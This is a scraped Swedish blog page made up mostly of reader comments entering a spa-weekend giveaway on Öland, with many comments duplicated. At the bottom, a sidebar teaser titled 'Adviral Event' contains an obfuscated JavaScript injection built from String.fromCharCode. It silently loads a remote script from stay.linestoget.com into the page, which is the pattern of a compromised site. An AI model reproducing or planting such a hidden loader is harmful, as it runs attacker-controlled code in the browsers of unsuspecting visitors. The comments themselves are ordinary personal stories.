  189. Som ensam trebarnsmamma till tre flickor är vardagen oftast lite svår att få ihop, och att unna sig något sånt här finns inte på kartan. Flickorna är 6, 8 och nio år gamla. Jag pluggar på heltid, barnen har aktiviter nästan varje dag, för det är väl klart att dom inte kan ha samma intressen så jag tycker att jag oftast spendera min lediga tid i bilen med att skjutsa barnen på sina saker. Tid för mig själv finns inte så därför så skulle jag vilja ta med min kärlek som jag tyvärr bara hinner träffa varannan helg då mina barn är hos sin pappa och hans barn hos sin mamma till vackra Gotland för en helg.

  190. Som ensam trebarnsmamma till tre flickor är vardagen oftast lite svår att få ihop, och att unna sig något sånt här finns inte på kartan. Flickorna är 6, 8 och nio år gamla. Jag pluggar på heltid, barnen har aktiviter nästan varje dag, för det är väl klart att dom inte kan ha samma intressen så jag tycker att jag oftast spendera min lediga tid i bilen med att skjutsa barnen på sina saker. Tid för mig själv finns inte så därför så skulle jag vilja ta med min kärlek som jag tyvärr bara hinner träffa varannan helg då mina barn är hos sin pappa och hans barn hos sin mamma till vackra Öland för en helg.

  191. Detta skulle vilja ta med min man på som ställer upp på mig 100 procent.
    Lider av ständig värk (reumatisk och fibromylagi). Har därför varit sjukskriven och kan inte gå tillbaka till mitt gamla jobb för att det är för hård belastning. Det har varit sjukvårdsbesök, albumlans åkningar m.m. Trotts detta så gifte vi oss förra året på sommaren. Känner att jag skulle vilja göra nått för honom då han ställer upp för mig.

  192. Egentligen vill jag inte komma med ngn snyft historia.
    År 2014 har varit ett skitår, men samtidigt ett helt fantastiskt år.
    Jag och min X make beslutade oss för att separera. Vi är bra vänner och har två fantastiska barn tillsammans.
    Men att separera är ändå väldigt smärtsamt. Speciellt då jag får vara ifrån mina älskade barn så mkt.

    Har även fått veta att min pappa, tryggheten i mitt liv, drabbats av en ovanlig cancer.

    Livet kändes piss ett tag. Men nu börjar jag komma på fötter igen.

    Att kanske få vinna denna spa upplevelse hade gjort gott för själen <3

    Kanske tillsammans med en ny kärlek?

  193. Hej My! Tack för en fin och ärlig blogg rakt ur livet!
    Jag skulle så gärna vilja vinna denna spa upplevelse för att överraska min kära man i höst mörkret! Skulle vara så uppiggande för trötta småbarnsföräldrar att få åka och rå om varandra!♡

  194. Hej!! Min msn och jag skyller verkligen behöva detta, det senaste året har frestat på hårt, med 2 dödsfall U familjen, sjukdom och andra tråkigheter. Åh att få unna oss detta :)! Kram

  195. Hej, jag skulle väldigt gärna vilja vinna det här spapaketet med övernattning! Jag och min man gifte oss för 1 år sedan i slutet av november. Skulle jag vinna så skulle jag ta med honom dit och ha en riktigt myskväll och ladda våra batterier. Båda pluggar och jobbar samtidigt så vi träffas mest när vi vaknar och precis innan vi somnar! Men fortfarande underbart att vara gift med honom! 🙂

  196. Jag skulle vilja vinna för att jag förtjänar det. Höstlyx är en stor önskan nu när mörkret kommer.
    Med vänlig hälsning, Sara

  197. Värdelös på motiveringar, MEN, tröttkörda utslita småbarnsföräldrar som behöver lugn och ro tillsammans! Det vore helt fantastiskt att kunna åka iväg och koppla av bara vi 2! Och som du skrev om man inte deltar kan man heller inte vinna!

  198. Jag och min sambo var haft ett tufft halv år bakom oss. Då han vart sjuk rejält på sin semester och låg inne en sväng på sjukhuset. Sedan har hösten inneburit massor med jobb för oss båda samt två små troll hemma. Så detta vore toppen för oss att vinna så vi kan få en stund för oss själva och hitta tillbaka till varandra!

  199. Avkoppling och lite egentid vore en fantastisk vardagslyx efter några motiga och tunga månader. Delat, gillat och hoppas ?

  200. Efter ett riktigt tungt år på jobbet och alldeles för lite ”ta han om dig själv tid” så hade jag älskat att få komma till Öland och pysslas om och dessutom få tid för att träffa gamla vänner som man träffar alldeles för sällan. Det hade blivit årets höjdpunkt!

  201. Skulle vilja vinna detta för att kunna ta med min mamma som behöver lite uppskattning för den otroliga mamma hon är. Hon sätter alltid oss barn först och det gör att hon oftast glömmer av sig själv. Under en tid har hon glömt av sig själv alldeles för ofta och det medför dålig sömn etc. Om jag skulle vinna detta kan jag på ett sätt kunna visa min otroliga uppskattning till den underbart fantastiska mamma hon är. Det räcker oftast med en blomma eller choklad men det känns inte som det är tillräckligt, vill ge något speciellt som får henne att slappna av en stund.
    Håller nu tummar och tår!
    Vill även passa på att hälsa till alla mammor där ute i världen, NI ÄR HELT FANTASTISKA!! <3

  202. Efter 6 år tillsammans med min man,knakar det lite i knutarna!
    Sen vårat första barn kom,för snart 5 år sedan,har vi inte haft en enda dag/kväll/natt tillsammans själva!
    Det skulle vara underbart att vinna detta,så bara vi två fick göra något tillsammans och bara vara vi för en stund,och kanske hitta tillbaka till ”oss” igen!

  203. Efter sju underbara barn så ser man att….Hjälp jag behöver på SPA! ….Zibbabbannone…..Ro hit vinsten så jag blir snäll… . ; )..
    Eller måste jag tala om att November är som gjord för att jag ska vinna typ ett paket som det här. Och och och……
    näää ääääh..Det är ju Baloo björnän..
    Ja ni förstår..Släng in mig i bubblet va?

  204. I mitt jobb som sjuksköterska möter jag dagligen folk som är svårt sjuka och försöker ta hand om dem och deras familj o anhöriga. Jag åker ofta hem från jobbet och känner sån stor tacksamhet för det jag har och för min fina familj. Det jag ofta glömmer bort eller prioriterar ned är mitt och min mans förhållande vilket borde vara det viktigaste för att kunna känna sig lycklig och ge våra barn en fin uppväxt. Jag skulle bli överlycklig om jag fick åka iväg med mannen jag älskar över allt annat . Skulle ta vara på varje sekund vi hade tillsammans. Tack för en underbar blogg. Kramar från annica

  205. Ja herregud vad skönt det skulle vara att få komma iväg med min man! Vi har styrt med flytt, renovering av nya bostaden och massa vabb. Sonen började förskolan i Augusti och åkt på allt känns det som. Förkylning, magsjuka, feber och lunginflammation på bara 2månader. Vi skulle berkligen behöva denna vistelse! Få sova ut och bara vara vi två utan snor , kräks och sparkande varma barn i sängen.

  206. En sliten heltidsarbetande 3 – barnmamma och fru skulle mer än något annat behöva lite vardagslyx ihop med min kärlek. Vi firar snart 2 – åriga brölloppsdag och har insett att vi inte har ekonomi till att fira det. Känns otroligt trist så nu hoppas jag på tur. Ett extra plus i kanten är att jag då skulle få möjligheten att kunna besöka din mysiga butik.

  207. Avkoppling och lite egentid vore en fantastisk vardagslyx efter några motiga och tunga månader. Delat, gillat och hoppas 🙂

  208. Hej My!
    Vilken superb tävling!
    Vi är nog väldigt många som alldeles för sällan unnar oss lite vardagslyx och rår om oss själva. Det är lätt att prioritera bort sig själv, särskilt som småbarnsförälder.
    Jag är iallafall en av dem som aldrig styr upp det där lilla extra, och nu när jag och min man fick vårt andra barn lär det bli ännu mer avlägset – när vi egentligen borde lägga ännu mer krut på att ta hand om oss själva och varandra, för att få förnyad energi att ta hand om vardagskaoset med trotsiga barn, blöjbyten och alla andra måsten.
    Alla tävlanden är garanterat lika värdiga vinnare, men jag håller självklart tummarna att lotten faller på mig, för hur skönt hade det inte varit att få lite vuxentid och avkoppling i lugn och ro? ?
    //Cecilia

  209. Hej My!

    Vilken superb tävling!
    Vi är nog väldigt många som alldeles för sällan unnar oss lite vardagslyx och rår om oss själva. Det är lätt att prioritera bort sig själv, särskilt som småbarnsförälder.
    Jag är iallafall en av dem som aldrig styr upp det där lilla extra, och nu när jag och min man fick vårt andra barn lär det bli ännu mer avlägset – när vi egentligen borde lägga ännu mer krut på att ta hand om oss själva och varandra, för att få förnyad energi att ta hand om vardagskaoset med trotsiga barn, blöjbyten och alla andra måsten.

    Alla tävlanden är garanterat lika värdiga vinnare, men jag håller självklart tummarna att lotten faller på mig, för hur skönt hade det inte varit att få lite vuxentid och avkoppling i lugn och ro? 🙂

    //Cecilia

  210. Hej My!
    Efter att ha längtat efter min utlandssemester sedan februari så var dagen D här den 27/9. Turkiet var destinationen. 18 st var vi i gänget, barn och vuxna. Nu skulle batterierna laddas efter en sommar med mest jobb. Men tyvärr

  211. Därför att vi är helt slut. Vi har renoverat upp alla pengar under sommaren och inte kommit utanför dörren. We need a rest!

  212. Hej My!
    Efter att ha längtat efter min utlandssemester sedan februari så var dagen D här den 27/9. Turkiet var destinationen. 18 st var vi i gänget, barn och vuxna. Nu skulle batterierna laddas efter en sommar med mest jobb. Men tyvärr

  213. Därför att vi är helt slut. Vi har renoverat upp alla pengar under sommaren och inte kommit utanför dörren. We need a rest!

  214. Ååhh jag håller tummarna att jag vinner! Jag hoppas jag vinner för nästa år fyller jag 30 (17/4) och skulle verkligen uppskatta denna fina upplevelse. Jag unnar mig ALDRIG sånt här. kramkram ?

  215. Ååhh jag håller tummarna att jag vinner! Jag hoppas jag vinner för nästa år fyller jag 30 (17/4) och skulle verkligen uppskatta denna fina upplevelse. Jag unnar mig ALDRIG sånt här. kramkram 😀

  216. Lyx! Ja, vem gillar inte det. Att få spendera en av mina lediga helger här hade varit toppen ihop med min sambo, då vi i vanliga fall tillbringar vår vardag på en trång 25kvm yta. Efter en helg på Skansen hade jag varit full av energi för att blomstra rent ut sagt, bland blommorna på Öland, det låter väl som en bra idé My?! Håller tummarna för vinst!!

  217. Detta lyxiga paket vill jag ge till mig själv i 40 års present . Fyller om mindre än en månad och det skulle vara underbart att fira detta på Skansen tillsammans med min älskade.❤️

  218. Lyx! Ja, vem gillar inte det. Att få spendera en av mina lediga helger här hade varit toppen ihop med min sambo, då vi i vanliga fall tillbringar vår vardag på en trång 25kvm yta. Efter en helg på Skansen hade jag varit full av energi för att blomstra rent ut sagt, bland blommorna på Öland, det låter väl som en bra idé My?! Håller tummarna för vinst!!

  219. Jag skulle jättegärna vilja vinna detta härliga åt min älskade mamma.
    Hon har fibromyalgi och varit sjukpensionär sen hon var ca 30 år, hon har aldrig råd att åka i väg någonstans och kan inte unna sig något. I somras gjorde hon en gastric by pass för att gå ner i vikt och underlätta värken. Men istället har hon fått biverkningar av operationen, hon kan inte äta ordentligt då det inte är ordentligt utvidgat , hon mår dåligt och hennes fibro har varit en riktig pina senaste tiden, hon har knappt kommit upp ur sängen. Får man åka båda två så hade det varit guld värt då jag sällan ser min mamma nuförtiden då jag bor 15 mil i från henne . Hon behöver en paus i vardagen från tristessen , värken och min tonårslillebror som är rätt trotsig emot henne.=) Hon behöver verkligen och är värd en miniweekend för att fylla på hennes energin igen som jag tycker att hon tappat. Jag vill ge henne detta, se henne pigg igen=)

  220. Detta lyxiga paket vill jag ge till mig själv i 40 års present . Fyller om mindre än en månad och det skulle vara underbart att fira detta på Skansen tillsammans med min älskade.❤️

  221. Åhh vilken underbar tävling! Då jag tycker hösten är lite mörk o deppig… Vad kan då bli bättre än ett besök på SPA!? ? Jag är gravid o väntar vårt första barn o skulle bli superlycklig om jag o min sambo kunde få komma bort o bara njuta tillsammans då han får mycket ”skit” nu när hormonerna spökar ? Tack för en bra blogg! Håller nu tummarna för vinst ?

  222. Jag skulle jättegärna vilja vinna detta härliga åt min älskade mamma.
    Hon har fibromyalgi och varit sjukpensionär sen hon var ca 30 år, hon har aldrig råd att åka i väg någonstans och kan inte unna sig något. I somras gjorde hon en gastric by pass för att gå ner i vikt och underlätta värken. Men istället har hon fått biverkningar av operationen, hon kan inte äta ordentligt då det inte är ordentligt utvidgat , hon mår dåligt och hennes fibro har varit en riktig pina senaste tiden, hon har knappt kommit upp ur sängen. Får man åka båda två så hade det varit guld värt då jag sällan ser min mamma nuförtiden då jag bor 15 mil i från henne . Hon behöver en paus i vardagen från tristessen , värken och min tonårslillebror som är rätt trotsig emot henne.=) Hon behöver verkligen och är värd en miniweekend för att fylla på hennes energin igen som jag tycker att hon tappat. Jag vill ge henne detta, se henne pigg igen=)

  223. Åhh vilken underbar tävling! Då jag tycker hösten är lite mörk o deppig… Vad kan då bli bättre än ett besök på SPA!? 🙂 Jag är gravid o väntar vårt första barn o skulle bli superlycklig om jag o min sambo kunde få komma bort o bara njuta tillsammans då han får mycket ”skit” nu när hormonerna spökar 🙁 Tack för en bra blogg! Håller nu tummarna för vinst 🙂

  224. Jag skulle så gärna vilja bjuda med min man på denna lilla mini-semester. Full avslappning, bara vara och ladda energi för en fullspäckad höst och vinter. Vi åker sällan iväg på något bara vi två och detta skulle vara underbart. Jag håller tummarna riktigt hårt för att vi ska få åka till fina hotell Skansen som jag hört så mycket fint om av nära och kära som varit där. Många kramar, Elin

  225. Jag skulle så gärna vilja bjuda med min man på denna lilla mini-semester. Full avslappning, bara vara och ladda energi för en fullspäckad höst och vinter. Vi åker sällan iväg på något bara vi två och detta skulle vara underbart. Jag håller tummarna riktigt hårt för att vi ska få åka till fina hotell Skansen som jag hört så mycket fint om av nära och kära som varit där. Många kramar, Elin

  226. Åhh precis vad jag skulle vilja överraska sambon med… Tre småttingar i hus gör att mamma å pappa inte får så mycket tid över till den berömda ”egentiden”… Vad hade väl varit ett bättre ställe att få njuta på än Skansen Öland!?! ?

  227. Åhh precis vad jag skulle vilja överraska sambon med… Tre småttingar i hus gör att mamma å pappa inte får så mycket tid över till den berömda ”egentiden”… Vad hade väl varit ett bättre ställe att få njuta på än Skansen Öland!?! 🙂

  228. Jag skulle så gärna vilja överraska min Sambo med en spahelg inför vår årsdag den 8 nov. Då har vi varit ihop i 17 år ? Både han och jag känner oss väldigt tomma på energi, och han borde ha ett pris som stått och står ut med mina pms-perioder. Tänk att få skämma bort honom och Mig! Vardagslyx inget vi unnar oss. Kram och tack

  229. Jag skulle så gärna vilja överraska min Sambo med en spahelg inför vår årsdag den 8 nov. Då har vi varit ihop i 17 år 💕 Både han och jag känner oss väldigt tomma på energi, och han borde ha ett pris som stått och står ut med mina pms-perioder. Tänk att få skämma bort honom och Mig! Vardagslyx inget vi unnar oss. Kram och tack

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/